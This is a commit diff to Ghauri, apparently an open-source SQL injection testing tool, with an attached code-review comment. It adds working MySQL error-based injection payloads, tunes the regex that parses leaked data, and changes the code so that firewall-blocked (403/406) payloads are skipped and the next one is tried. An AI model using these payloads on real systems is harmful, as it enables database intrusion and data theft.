  • added multiple fixes to multiple types of injections.

  • r0oth3x49 committed 1 year ago
    8afc6b3f
    1 parent b62726e4
  • ■ ■ ■ ■ ■ ■
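--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -77,7 +77,8 @@
 # r"(?isx)(Duplicate\s*entry\s*\'(?:~)(?:\()?(?P<error_based_response>.*?))1\'"
 # )
 REGEX_ERROR_BASED = (
-r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~)?1\1)"
+# r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~)?1\1)"
+r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~1)?\1)"
 )
 REGEX_BIGINT_BASED = (
 r"(?isx)(BIGINT.*\s.*Injected~(?:\()?(?P<error_based_response>.*?))\~END"
@@ -765,6 +766,58 @@
 "dbms": "MySQL",
 },
 {
+"payload": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
+"comments": [
+# {"pref": " ", "suf": ""},
+{"pref": " ", "suf": "-- wXyW"},
+{"pref": " ", "suf": "#"},
+# {"pref": "' ", "suf": ""},
+{"pref": "' ", "suf": "-- wXyW"},
+{"pref": "' ", "suf": "#"},
+# {"pref": '" ', "suf": ""},
+{"pref": '" ', "suf": "-- wXyW"},
+{"pref": '" ', "suf": "#"},
+# {"pref": ") ", "suf": ""},
+{"pref": ") ", "suf": "-- wXyW"},
+{"pref": ") ", "suf": "#"},
+# {"pref": "') ", "suf": ""},
+{"pref": "') ", "suf": "-- wXyW"},
+{"pref": "') ", "suf": "#"},
+# {"pref": '") ', "suf": ""},
+{"pref": '") ', "suf": "-- wXyW"},
+{"pref": '") ', "suf": "#"},
+],
+"title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
+"vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
+"dbms": "MySQL",
+},
+{
+"payload": "OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))",
+"comments": [
+# {"pref": " ", "suf": ""},
+{"pref": " ", "suf": "-- wXyW"},
+{"pref": " ", "suf": "#"},
+# {"pref": "' ", "suf": ""},
+{"pref": "' ", "suf": "-- wXyW"},
+{"pref": "' ", "suf": "#"},
+# {"pref": '" ', "suf": ""},
+{"pref": '" ', "suf": "-- wXyW"},
+{"pref": '" ', "suf": "#"},
+# {"pref": ") ", "suf": ""},
+{"pref": ") ", "suf": "-- wXyW"},
+{"pref": ") ", "suf": "#"},
+# {"pref": "') ", "suf": ""},
+{"pref": "') ", "suf": "-- wXyW"},
+{"pref": "') ", "suf": "#"},
+# {"pref": '") ', "suf": ""},
+{"pref": '") ', "suf": "-- wXyW"},
+{"pref": '") ', "suf": "#"},
+],
+"title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
+"vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
+"dbms": "MySQL",
+},
+{
 "payload": "UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
 "comments": [
 {"pref": "", "suf": ""},
@@ -894,58 +947,6 @@
 ],
 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)",
 "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
-"dbms": "MySQL",
-},
-{
-"payload": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
-"comments": [
-# {"pref": " ", "suf": ""},
-{"pref": " ", "suf": "-- wXyW"},
-{"pref": " ", "suf": "#"},
-# {"pref": "' ", "suf": ""},
-{"pref": "' ", "suf": "-- wXyW"},
-{"pref": "' ", "suf": "#"},
-# {"pref": '" ', "suf": ""},
-{"pref": '" ', "suf": "-- wXyW"},
-{"pref": '" ', "suf": "#"},
-# {"pref": ") ", "suf": ""},
-{"pref": ") ", "suf": "-- wXyW"},
-{"pref": ") ", "suf": "#"},
-# {"pref": "') ", "suf": ""},
-{"pref": "') ", "suf": "-- wXyW"},
-{"pref": "') ", "suf": "#"},
-# {"pref": '") ', "suf": ""},
-{"pref": '") ', "suf": "-- wXyW"},
-{"pref": '") ', "suf": "#"},
-],
-"title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
-"vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
-"dbms": "MySQL",
-},
-{
-"payload": "OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))",
-"comments": [
-# {"pref": " ", "suf": ""},
-{"pref": " ", "suf": "-- wXyW"},
-{"pref": " ", "suf": "#"},
-# {"pref": "' ", "suf": ""},
-{"pref": "' ", "suf": "-- wXyW"},
-{"pref": "' ", "suf": "#"},
-# {"pref": '" ', "suf": ""},
-{"pref": '" ', "suf": "-- wXyW"},
-{"pref": '" ', "suf": "#"},
-# {"pref": ") ", "suf": ""},
-{"pref": ") ", "suf": "-- wXyW"},
-{"pref": ") ", "suf": "#"},
-# {"pref": "') ", "suf": ""},
-{"pref": "') ", "suf": "-- wXyW"},
-{"pref": "') ", "suf": "#"},
-# {"pref": '") ', "suf": ""},
-{"pref": '") ', "suf": "-- wXyW"},
-{"pref": '") ', "suf": "#"},
-],
-"title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
-"vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
 "dbms": "MySQL",
 },
 {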
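Review bot: The new REGEX_ERROR_BASED in the first hunk only consumes a trailing `~1` as the marker, so for the CONCAT_WS(0x28, …, FLOOR(RAND(0)*2)) vectors added in the second hunk the lazy `(.*?)` capture runs up to the closing quote and `error_based_response` comes back with a trailing `(1` (the old pattern's mandatory `1` before `\1` used to strip that digit); unless the caller already strips that suffix, `(?:[~(]1)?\1` would consume the separator-plus-counter for both vector shapes. Leaving the previous pattern as a commented-out line directly above the live one is dead code that git history already preserves; a short why-comment such as `# trailing ~1 / (1 comes from FLOOR(RAND(0)*2), it is a marker not query output` would serve later readers better. The second and third hunks only move the two FLOOR entries ahead of the UPDATEXML ones, which changes which error-based vector is tried first, so a sentence on the commit stating that the new priority is intentional would be worth adding.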
  • ■ ■ ■ ■ ■
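--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -635,7 +635,11 @@
 _cases.append("Status Code")
 if _cases:
 case = ", ".join(_cases)
-logger.debug(f"possible injectable cases detected: '{case}'")
+if 403 in [scb, sct, scf]:
+case = ""
+is_vulner = False
+else:
+logger.debug(f"possible injectable cases detected: '{case}'")
 if case == "Page Ratio":
 w0set = set(get_filtered_page_content(base.text, True, "\n").split("\n"))
 w1set = set(get_filtered_page_content(attack_true.text, True, "\n").split("\n"))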
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 140 lines
    141 141   expression = entry.get("expression")
    142 142   _type = entry.get("type")
    143 143   logger.payload(f"{expression}")
    144  - if http_firewall_code_counter > 2:
    145  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    146  - logger.warning(f"HTTP error code detected during run:")
    147  - choice = logger.read_input(
    148  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    149  - batch=False,
    150  - user_input="C",
    151  - )
    152  - if choice == "q":
    153  - logger.error("user quit")
    154  - logger.end("ending")
    155  - exit(0)
    156  - if choice == "c":
    157  - http_firewall_code_counter = 0
    158  - if retry_on_error >= retry:
    159  - logger.warning(f"Ghauri detected connection errors multiple times")
    160  - choice = logger.read_input(
    161  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    162  - batch=False,
    163  - user_input="C",
    164  - )
    165  - if choice == "q":
    166  - logger.error("user quit")
    167  - logger.end("ending")
    168  - exit(0)
    169  - if choice == "c":
    170  - retry_on_error = 0
     144 + # if http_firewall_code_counter > 2:
     145 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     146 + # logger.warning(f"HTTP error code detected during run:")
     147 + # choice = logger.read_input(
     148 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     149 + # batch=False,
     150 + # user_input="C",
     151 + # )
     152 + # if choice == "q":
     153 + # logger.error("user quit")
     154 + # logger.end("ending")
     155 + # exit(0)
     156 + # if choice == "c":
     157 + # http_firewall_code_counter = 0
     158 + # if retry_on_error >= retry:
     159 + # logger.warning(f"Ghauri detected connection errors multiple times")
     160 + # choice = logger.read_input(
     161 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     162 + # batch=False,
     163 + # user_input="C",
     164 + # )
     165 + # if choice == "q":
     166 + # logger.error("user quit")
     167 + # logger.end("ending")
     168 + # exit(0)
     169 + # if choice == "c":
     170 + # retry_on_error = 0
    171 171   if delay > 0:
    172 172   time.sleep(delay)
    173 173   try:
    skipped 10 lines
    184 184   is_multipart=is_multipart,
    185 185   injection_type=injection_type,
    186 186   )
    187  - if attack.status_code in [403, 406]:
    188  - logger.critical(
    189  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    190  - )
    191  - time.sleep(0.5)
    192  - error_msg = attack.error_msg
    193  - http_firewall_code_counter += 1
    194  - continue
     187 + # if attack.status_code in [403, 406]:
     188 + # logger.critical(
     189 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     190 + # )
     191 + # time.sleep(0.5)
     192 + # error_msg = attack.error_msg
     193 + # http_firewall_code_counter += 1
     194 + # continue
    195 195   logger.debug(
    196 196   f"sleep time: {timesec}, response time: {attack.response_time}"
    197 197   )
    skipped 135 lines
    333 333   error_msg = None
    334 334   if identified_character:
    335 335   for i in range(1, retry + 1):
    336  - if http_firewall_code_counter > 2:
    337  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    338  - logger.warning(f"HTTP error code detected during run:")
    339  - choice = logger.read_input(
    340  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    341  - batch=False,
    342  - user_input="C",
    343  - )
    344  - if choice == "q":
    345  - logger.error("user quit")
    346  - logger.end("ending")
    347  - exit(0)
    348  - if choice == "c":
    349  - http_firewall_code_counter = 0
    350  - if retry_on_error >= retry:
    351  - logger.warning(f"Ghauri detected connection errors multiple times")
    352  - choice = logger.read_input(
    353  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    354  - batch=False,
    355  - user_input="C",
    356  - )
    357  - if choice == "q":
    358  - logger.error("user quit")
    359  - logger.end("ending")
    360  - exit(0)
    361  - if choice == "c":
    362  - retry_on_error = 0
     336 + # if http_firewall_code_counter > 2:
     337 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     338 + # logger.warning(f"HTTP error code detected during run:")
     339 + # choice = logger.read_input(
     340 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     341 + # batch=False,
     342 + # user_input="C",
     343 + # )
     344 + # if choice == "q":
     345 + # logger.error("user quit")
     346 + # logger.end("ending")
     347 + # exit(0)
     348 + # if choice == "c":
     349 + # http_firewall_code_counter = 0
     350 + # if retry_on_error >= retry:
     351 + # logger.warning(f"Ghauri detected connection errors multiple times")
     352 + # choice = logger.read_input(
     353 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     354 + # batch=False,
     355 + # user_input="C",
     356 + # )
     357 + # if choice == "q":
     358 + # logger.error("user quit")
     359 + # logger.end("ending")
     360 + # exit(0)
     361 + # if choice == "c":
     362 + # retry_on_error = 0
    363 363   if delay > 0:
    364 364   time.sleep(delay)
    365 365   condition = expression_payload.format(
    skipped 24 lines
    390 390   is_multipart=is_multipart,
    391 391   injection_type=injection_type,
    392 392   )
    393  - if attack.status_code in [403, 406]:
    394  - logger.critical(
    395  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    396  - )
    397  - time.sleep(0.5)
    398  - error_msg = attack.error_msg
    399  - http_firewall_code_counter += 1
    400  - continue
     393 + # if attack.status_code in [403, 406]:
     394 + # logger.critical(
     395 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     396 + # )
     397 + # time.sleep(0.5)
     398 + # error_msg = attack.error_msg
     399 + # http_firewall_code_counter += 1
     400 + # continue
    401 401   logger.debug(
    402 402   f"sleep time: {sleep_time}, response time: {attack.response_time}"
    403 403   )
    skipped 124 lines
    528 528   )
    529 529   index = 0
    530 530   while index < len(sorted_ascii_list):
    531  - if http_firewall_code_counter > 2:
    532  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    533  - logger.warning(f"HTTP error code detected during run:")
    534  - choice = logger.read_input(
    535  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    536  - batch=False,
    537  - user_input="C",
    538  - )
    539  - if choice == "q":
    540  - logger.error("user quit")
    541  - logger.end("ending")
    542  - exit(0)
    543  - if choice == "c":
    544  - http_firewall_code_counter = 0
    545  - if retry_on_error >= retry:
    546  - logger.warning(f"Ghauri detected connection errors multiple times")
    547  - choice = logger.read_input(
    548  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    549  - batch=False,
    550  - user_input="C",
    551  - )
    552  - if choice == "q":
    553  - logger.error("user quit")
    554  - logger.end("ending")
    555  - exit(0)
    556  - if choice == "c":
    557  - retry_on_error = 0
     531 + # if http_firewall_code_counter > 2:
     532 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     533 + # logger.warning(f"HTTP error code detected during run:")
     534 + # choice = logger.read_input(
     535 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     536 + # batch=False,
     537 + # user_input="C",
     538 + # )
     539 + # if choice == "q":
     540 + # logger.error("user quit")
     541 + # logger.end("ending")
     542 + # exit(0)
     543 + # if choice == "c":
     544 + # http_firewall_code_counter = 0
     545 + # if retry_on_error >= retry:
     546 + # logger.warning(f"Ghauri detected connection errors multiple times")
     547 + # choice = logger.read_input(
     548 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     549 + # batch=False,
     550 + # user_input="C",
     551 + # )
     552 + # if choice == "q":
     553 + # logger.error("user quit")
     554 + # logger.end("ending")
     555 + # exit(0)
     556 + # if choice == "c":
     557 + # retry_on_error = 0
    558 558   if delay > 0:
    559 559   time.sleep(delay)
    560 560   characters_list = sorted_ascii_list[index]
    skipped 22 lines
    583 583   is_multipart=is_multipart,
    584 584   injection_type=injection_type,
    585 585   )
    586  - if attack.status_code in [403, 406]:
    587  - logger.critical(
    588  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    589  - )
    590  - time.sleep(0.5)
    591  - error_msg = attack.error_msg
    592  - http_firewall_code_counter += 1
    593  - continue
     586 + # if attack.status_code in [403, 406]:
     587 + # logger.critical(
     588 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     589 + # )
     590 + # time.sleep(0.5)
     591 + # error_msg = attack.error_msg
     592 + # http_firewall_code_counter += 1
     593 + # continue
    594 594   response_time = attack.response_time
    595 595   logger.debug(
    596 596   f"sleep time: {sleep_time}, response time: {response_time}"
    skipped 136 lines
    733 733   logger.progress(f"retrieved: {chars}")
    734 734   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    735 735   while not is_found:
    736  - if http_firewall_code_counter > 2:
    737  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    738  - logger.warning(f"HTTP error code detected during run:")
    739  - choice = logger.read_input(
    740  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    741  - batch=False,
    742  - user_input="C",
    743  - )
    744  - if choice == "q":
    745  - logger.error("user quit")
    746  - logger.end("ending")
    747  - exit(0)
    748  - if choice == "c":
    749  - http_firewall_code_counter = 0
    750  - if retry_on_error >= retry:
    751  - logger.warning(f"Ghauri detected connection errors multiple times")
    752  - choice = logger.read_input(
    753  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    754  - batch=False,
    755  - user_input="C",
    756  - )
    757  - if choice == "q":
    758  - logger.error("user quit")
    759  - logger.end("ending")
    760  - exit(0)
    761  - if choice == "c":
    762  - retry_on_error = 0
     736 + # if http_firewall_code_counter > 2:
     737 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     738 + # logger.warning(f"HTTP error code detected during run:")
     739 + # choice = logger.read_input(
     740 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     741 + # batch=False,
     742 + # user_input="C",
     743 + # )
     744 + # if choice == "q":
     745 + # logger.error("user quit")
     746 + # logger.end("ending")
     747 + # exit(0)
     748 + # if choice == "c":
     749 + # http_firewall_code_counter = 0
     750 + # if retry_on_error >= retry:
     751 + # logger.warning(f"Ghauri detected connection errors multiple times")
     752 + # choice = logger.read_input(
     753 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     754 + # batch=False,
     755 + # user_input="C",
     756 + # )
     757 + # if choice == "q":
     758 + # logger.error("user quit")
     759 + # logger.end("ending")
     760 + # exit(0)
     761 + # if choice == "c":
     762 + # retry_on_error = 0
    763 763   if conf._readtimout_counter >= 3:
    764 764   logger.warning(
    765 765   f"Ghauri detected readtimout '{conf._readtimout_counter}' time(s), increasing --timeout to 120 seconds, default was 30 seconds.."
    skipped 42 lines
    808 808   is_multipart=is_multipart,
    809 809   injection_type=injection_type,
    810 810   )
    811  - if attack.status_code in [403, 406]:
    812  - logger.critical(
    813  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    814  - )
    815  - time.sleep(0.5)
    816  - error_msg = attack.error_msg
    817  - http_firewall_code_counter += 1
    818  - ascii_char = ascii_char
    819  - minimum = minimum
    820  - maximum = maximum
    821  - continue
     811 + # if attack.status_code in [403, 406]:
     812 + # logger.critical(
     813 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     814 + # )
     815 + # time.sleep(0.5)
     816 + # error_msg = attack.error_msg
     817 + # http_firewall_code_counter += 1
     818 + # ascii_char = ascii_char
     819 + # minimum = minimum
     820 + # maximum = maximum
     821 + # continue
    822 822   response_time = attack.response_time
    823 823   logger.debug(
    824 824   f"sleep time: {sleep_time}, response time: {response_time}"
    skipped 97 lines
    922 922   retry_on_error = 0
    923 923   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    924 924   while start < end:
    925  - if http_firewall_code_counter > 2:
    926  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    927  - logger.warning(f"HTTP error code detected during run:")
    928  - choice = logger.read_input(
    929  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    930  - batch=False,
    931  - user_input="C",
    932  - )
    933  - if choice == "q":
    934  - logger.error("user quit")
    935  - logger.end("ending")
    936  - exit(0)
    937  - if choice == "c":
    938  - http_firewall_code_counter = 0
    939  - if retry_on_error >= retry:
    940  - logger.warning(f"Ghauri detected connection errors multiple times")
    941  - choice = logger.read_input(
    942  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    943  - batch=False,
    944  - user_input="C",
    945  - )
    946  - if choice == "q":
    947  - logger.error("user quit")
    948  - logger.end("ending")
    949  - exit(0)
    950  - if choice == "c":
    951  - retry_on_error = 0
     925 + # if http_firewall_code_counter > 2:
     926 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     927 + # logger.warning(f"HTTP error code detected during run:")
     928 + # choice = logger.read_input(
     929 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     930 + # batch=False,
     931 + # user_input="C",
     932 + # )
     933 + # if choice == "q":
     934 + # logger.error("user quit")
     935 + # logger.end("ending")
     936 + # exit(0)
     937 + # if choice == "c":
     938 + # http_firewall_code_counter = 0
     939 + # if retry_on_error >= retry:
     940 + # logger.warning(f"Ghauri detected connection errors multiple times")
     941 + # choice = logger.read_input(
     942 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     943 + # batch=False,
     944 + # user_input="C",
     945 + # )
     946 + # if choice == "q":
     947 + # logger.error("user quit")
     948 + # logger.end("ending")
     949 + # exit(0)
     950 + # if choice == "c":
     951 + # retry_on_error = 0
    952 952   ascii_char = list_of_chars[start]
    953 953   if delay > 0:
    954 954   time.sleep(delay)
    skipped 19 lines
    974 974   is_multipart=is_multipart,
    975 975   injection_type=injection_type,
    976 976   )
    977  - if attack.status_code in [403, 406]:
    978  - logger.critical(
    979  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    980  - )
    981  - time.sleep(0.5)
    982  - error_msg = attack.error_msg
    983  - http_firewall_code_counter += 1
    984  - continue
     977 + # if attack.status_code in [403, 406]:
     978 + # logger.critical(
     979 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     980 + # )
     981 + # time.sleep(0.5)
     982 + # error_msg = attack.error_msg
     983 + # http_firewall_code_counter += 1
     984 + # continue
    985 985   start += 1
    986 986   if attack01 and vector_type == "boolean_vector":
    987 987   bool_retval = check_boolean_responses(
    skipped 86 lines
    1074 1074   is_noc_payload_found = False
    1075 1075   for entry in payloads:
    1076 1076   is_noc_found = False
    1077  - for i in range(1, 10):
     1077 + start_pos = 1
     1078 + stop = 10
     1079 + while start_pos < stop:
    1078 1080   if delay > 0:
    1079 1081   time.sleep(delay)
    1080 1082   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    1081  - condition = value.format(query=entry, char=i)
     1083 + condition = value.format(query=entry, char=start_pos)
    1082 1084   expression = vector.replace("[INFERENCE]", f"{condition}").replace(
    1083 1085   "[SLEEPTIME]", f"{sleep_time}"
    1084 1086   )
    skipped 18 lines
    1103 1105   )
    1104 1106   logger.end("ending")
    1105 1107   exit(0)
     1108 + if attack.status_code in [403, 406]:
     1109 + # move towards next payload in a list as current payload is restricted by firewall
     1110 + logger.debug(
     1111 + "moving towards next payload in a list as current payload is restricted by firewall."
     1112 + )
     1113 + break
    1106 1114   if attack01 and vector_type == "boolean_vector":
    1107 1115   bool_retval = check_boolean_responses(
    1108 1116   base,
    skipped 8 lines
    1117 1125   if result:
    1118 1126   working_query = entry
    1119 1127   logger.debug(
    1120  - f"retrieved number of characters in length query {i}"
     1128 + f"retrieved number of characters in length query {start_pos}"
    1121 1129   )
    1122  - noc = i
     1130 + noc = start_pos
    1123 1131   is_noc_found = True
    1124 1132   break
    1125 1133   if vector_type == "time_vector":
    skipped 4 lines
    1130 1138   if response_time >= sleep_time:
    1131 1139   working_query = entry
    1132 1140   logger.debug(
    1133  - f"retrieved number of characters in length query {i}"
     1141 + f"retrieved number of characters in length query {start_pos}"
    1134 1142   )
    1135  - noc = i
     1143 + noc = start_pos
    1136 1144   is_noc_found = True
    1137 1145   break
     1146 + start_pos += 1
    1138 1147   if is_noc_found:
    1139 1148   is_noc_payload_found = True
    1140 1149   break
    skipped 52 lines
    1193 1202   )
    1194 1203   if query_check and noc > 0:
    1195 1204   return _
     1205 + if noc < 1:
     1206 + logger.debug(
     1207 + "Ghauri couldn't determine the number if character(s) in length query"
     1208 + )
    1196 1209   length = 0
    1197  - if not suppress_output:
    1198  - logger.info(f"retrieving the length of query output")
    1199  - length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
    1200  - if isinstance(length_extraction_payloads, str):
    1201  - length_extraction_payloads = [length_extraction_payloads]
    1202  - attack_url = url
    1203  - attack_data = data
    1204  - attack_headers = headers
    1205  - for value in length_extraction_payloads:
    1206  - is_length_found = False
    1207  - for entry in payloads:
    1208  - chars = ""
    1209  - pos = 1
    1210  - total_number_of_characters = noc + 1
    1211  - while pos < total_number_of_characters:
    1212  - if attack01 and vector_type == "boolean_vector":
    1213  - try:
    1214  - retval = self._binary_search(
    1215  - url=url,
    1216  - data=data,
    1217  - vector=vector,
    1218  - parameter=parameter,
    1219  - headers=headers,
    1220  - base=base,
    1221  - injection_type=injection_type,
    1222  - delay=delay,
    1223  - timesec=timesec,
    1224  - timeout=timeout,
    1225  - proxy=proxy,
    1226  - attack01=attack01,
    1227  - code=code,
    1228  - match_string=match_string,
    1229  - not_match_string=not_match_string,
    1230  - is_multipart=is_multipart,
    1231  - suppress_output=suppress_output,
    1232  - query_check=query_check,
    1233  - minimum=48,
    1234  - maximum=58,
    1235  - offset=pos,
    1236  - expression_payload=value,
    1237  - queryable=entry,
    1238  - chars=chars,
    1239  - text_only=text_only,
    1240  - vector_type=vector_type,
    1241  - )
    1242  - if retval:
    1243  - is_valid = self.validate_character(
     1210 + if noc > 1:
     1211 + if not suppress_output:
     1212 + logger.info(f"retrieving the length of query output")
     1213 + length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
     1214 + if isinstance(length_extraction_payloads, str):
     1215 + length_extraction_payloads = [length_extraction_payloads]
     1216 + attack_url = url
     1217 + attack_data = data
     1218 + attack_headers = headers
     1219 + for value in length_extraction_payloads:
     1220 + is_length_found = False
     1221 + for entry in payloads:
     1222 + chars = ""
     1223 + pos = 1
     1224 + total_number_of_characters = noc + 1
     1225 + while pos < total_number_of_characters:
     1226 + if attack01 and vector_type == "boolean_vector":
     1227 + try:
     1228 + retval = self._binary_search(
    1244 1229   url=url,
    1245 1230   data=data,
    1246 1231   vector=vector,
    skipped 1 lines
    1248 1233   headers=headers,
    1249 1234   base=base,
    1250 1235   injection_type=injection_type,
     1236 + delay=delay,
     1237 + timesec=timesec,
     1238 + timeout=timeout,
     1239 + proxy=proxy,
     1240 + attack01=attack01,
     1241 + code=code,
     1242 + match_string=match_string,
     1243 + not_match_string=not_match_string,
     1244 + is_multipart=is_multipart,
     1245 + suppress_output=suppress_output,
     1246 + query_check=query_check,
     1247 + minimum=48,
     1248 + maximum=58,
     1249 + offset=pos,
     1250 + expression_payload=value,
     1251 + queryable=entry,
     1252 + chars=chars,
     1253 + text_only=text_only,
     1254 + vector_type=vector_type,
     1255 + )
     1256 + if retval:
     1257 + is_valid = self.validate_character(
     1258 + url=url,
     1259 + data=data,
     1260 + vector=vector,
     1261 + parameter=parameter,
     1262 + headers=headers,
     1263 + base=base,
     1264 + injection_type=injection_type,
     1265 + proxy=proxy,
     1266 + is_multipart=is_multipart,
     1267 + timeout=timeout,
     1268 + delay=delay,
     1269 + timesec=timesec,
     1270 + identified_character=retval,
     1271 + vector_type=vector_type,
     1272 + offset=pos,
     1273 + expression_payload=value,
     1274 + queryable=entry,
     1275 + code=code,
     1276 + match_string=match_string,
     1277 + not_match_string=not_match_string,
     1278 + attack01=attack01,
     1279 + )
     1280 + if not is_valid:
     1281 + logger.warning(
     1282 + "invalid character detected, retrying."
     1283 + )
     1284 + break
     1285 + if is_valid:
     1286 + pos += 1
     1287 + chars += retval
     1288 + logger.debug(f"character found: {chars}")
     1289 + except KeyboardInterrupt:
     1290 + is_length_found = True
     1291 + length = 0
     1292 + break
     1293 + if vector_type == "time_vector":
     1294 + try:
     1295 + retval = self._linear_search(
     1296 + url=url,
     1297 + data=data,
     1298 + vector=vector,
     1299 + parameter=parameter,
     1300 + headers=headers,
     1301 + injection_type=injection_type,
    1251 1302   proxy=proxy,
    1252 1303   is_multipart=is_multipart,
    1253 1304   timeout=timeout,
    1254 1305   delay=delay,
    1255 1306   timesec=timesec,
    1256  - identified_character=retval,
    1257  - vector_type=vector_type,
    1258  - offset=pos,
     1307 + suppress_output=suppress_output,
    1259 1308   expression_payload=value,
    1260 1309   queryable=entry,
    1261  - code=code,
    1262  - match_string=match_string,
    1263  - not_match_string=not_match_string,
    1264  - attack01=attack01,
     1310 + chars=chars,
     1311 + offset=pos,
     1312 + list_of_chars="2013456789",
     1313 + vector_type=vector_type,
    1265 1314   )
    1266  - if not is_valid:
    1267  - logger.warning(
    1268  - "invalid character detected, retrying."
    1269  - )
    1270  - break
    1271  - if is_valid:
    1272 1315   pos += 1
    1273 1316   chars += retval
    1274  - logger.debug(f"character found: {chars}")
    1275  - except KeyboardInterrupt:
    1276  - is_length_found = True
    1277  - length = 0
    1278  - break
    1279  - if vector_type == "time_vector":
    1280  - try:
    1281  - retval = self._linear_search(
    1282  - url=url,
    1283  - data=data,
    1284  - vector=vector,
    1285  - parameter=parameter,
    1286  - headers=headers,
    1287  - injection_type=injection_type,
    1288  - proxy=proxy,
    1289  - is_multipart=is_multipart,
    1290  - timeout=timeout,
    1291  - delay=delay,
    1292  - timesec=timesec,
    1293  - suppress_output=suppress_output,
    1294  - expression_payload=value,
    1295  - queryable=entry,
    1296  - chars=chars,
    1297  - offset=pos,
    1298  - list_of_chars="2013456789",
    1299  - vector_type=vector_type,
    1300  - )
    1301  - pos += 1
    1302  - chars += retval
    1303  - logger.debug(f"character found: '{str(chars)}'")
    1304  - except KeyboardInterrupt:
    1305  - is_length_found = True
    1306  - length = 0
    1307  - break
    1308  - if len(chars) == noc:
    1309  - if not suppress_output:
    1310  - logger.info(f"retrieved: {chars}")
    1311  - length = int(chars) if chars.isdigit() else 0
    1312  - is_length_found = True
     1317 + logger.debug(f"character found: '{str(chars)}'")
     1318 + except KeyboardInterrupt:
     1319 + is_length_found = True
     1320 + length = 0
     1321 + break
     1322 + if len(chars) == noc:
     1323 + if not suppress_output:
     1324 + logger.info(f"retrieved: {chars}")
     1325 + length = int(chars) if chars.isdigit() else 0
     1326 + is_length_found = True
     1327 + break
     1328 + if is_length_found:
    1313 1329   break
    1314  - if is_length_found:
    1315  - break
    1316 1330   return length
